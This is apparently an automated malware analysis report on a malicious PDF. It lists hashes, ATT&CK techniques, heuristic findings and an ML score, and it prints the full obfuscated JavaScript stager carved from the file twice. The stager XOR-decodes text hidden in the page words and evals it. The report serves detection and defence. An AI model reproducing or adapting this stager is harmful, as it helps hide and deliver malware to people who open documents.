PDF malware analysis — malicious · 73ff0700a24e757c

MALICIOUS

PDF

4.6 KB Created: 2010-04-30 20:47:26 Authoring application: Fodebarexa

MD5: 2921157730ac8701b69b827ca30dfe3a SHA-1: 8343b32ed125f291a07e74ffcae71f9c250521ae SHA-256: 73ff0700a24e757cd7244b1edd7c7ffe0879f75aace3436afd6ca8dddca79d73

86 Risk Score

Malware Insights

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF sample contains embedded JavaScript that is obfuscated using character code manipulation and XOR operations. The script appears to be a stager designed to decode and execute a second-stage payload, likely leveraging a known PDF vulnerability for execution. The ML classifier strongly indicates maliciousness, and the heuristics point to a JavaScript-based exploit.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

Page-word XOR JavaScript eval stager high PDF_PAGE_WORD_XOR_EVAL_STAGER

PDF JavaScript enumerates rendered page words with getPageNthWord/getPageNumWords, extracts encoded byte fragments, XOR-decodes the stage with char-code helpers, and evals the result. This is an old exploit-kit staging pattern and is not normal document JavaScript.
JavaScript action low 1 related finding PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0010_000.js
7ad1ee8cba7784f1a95b635244a4165fad123a151fe73c8fc9a0d61755caba74 pdf-javascript-stream PDF /JS object 10 at offset 0xCAB 874 bytes

Filename	Kind	Source	Size
`javascript_obj0010_000.js` `7ad1ee8cba7784f1a95b635244a4165fad123a151fe73c8fc9a0d61755caba74`	pdf-javascript-stream	PDF /JS object 10 at offset 0xCAB	874 bytes
Preview script First 1,000 lines of the extracted script var d=String;function r(j,h){return j^h;};var rC="getPa"+"geNumKxwy".substr(0,5)+"RXlWords".substr(3);var cF="from"+"Char"+"CodewR2G".substr(0,4);;var hS=this;var uH=1;var x=new String();var l=String("char"+"CodeMPrL".substr(0,4)+"pmEAtmEp".substr(3,2));var lE=110;var eZ=new String("subs"+"tro5c8".substr(0,2));var z=String("getPJF0o".substr(0,4)+"ageN"+"kNOthWokON".substr(3,4)+"ER7rd7ER".substr(3,2));var v="unesxbWN".substr(0,4)+"cape";var p=["p","a","","p"];b=new String(p[1]+p[0]+p[0]+p[2]);var vQ=["l","v","a","e",""];kX=new String(vQ[3]+vQ[1]+vQ[2]+vQ[0]+vQ[4]);;var jW=65-64;var qV=new String("%oMLO".substr(0,1));var pK=53-51;var mB=3091-3091;;var hU=hS[rC](uH);var gJ=hS[kX];var b=hS[b];var zY=hS[v];for(var uHC=mB;uHC<hU;uHC+=jW){qVC=hS[z](uH,uHC);var iV=qVC[eZ](qVC.length-pK,pK);var hI=qV+iV;var mF=zY(hI);var rE=mF[l](mB);var cD=r(rE,lE);x+=d[cF](cD);}gJ(x);

Preview script

First 1,000 lines of the extracted script

var d=String;function r(j,h){return j^h;};var rC="getPa"+"geNumKxwy".substr(0,5)+"RXlWords".substr(3);var cF="from"+"Char"+"CodewR2G".substr(0,4);;var hS=this;var uH=1;var x=new String();var l=String("char"+"CodeMPrL".substr(0,4)+"pmEAtmEp".substr(3,2));var lE=110;var eZ=new String("subs"+"tro5c8".substr(0,2));var z=String("getPJF0o".substr(0,4)+"ageN"+"kNOthWokON".substr(3,4)+"ER7rd7ER".substr(3,2));var v="unesxbWN".substr(0,4)+"cape";var p=["p","a","","p"];b=new String(p[1]+p[0]+p[0]+p[2]);var vQ=["l","v","a","e",""];kX=new String(vQ[3]+vQ[1]+vQ[2]+vQ[0]+vQ[4]);;var jW=65-64;var qV=new String("%oMLO".substr(0,1));var pK=53-51;var mB=3091-3091;;var hU=hS[rC](uH);var gJ=hS[kX];var b=hS[b];var zY=hS[v];for(var uHC=mB;uHC<hU;uHC+=jW){qVC=hS[z](uH,uHC);var iV=qVC[eZ](qVC.length-pK,pK);var hI=qV+iV;var mF=zY(hI);var rE=mF[l](mB);var cD=r(rE,lE);x+=d[cF](cD);}gJ(x);

Open this report in the interactive analyzer, or submit your own file for analysis.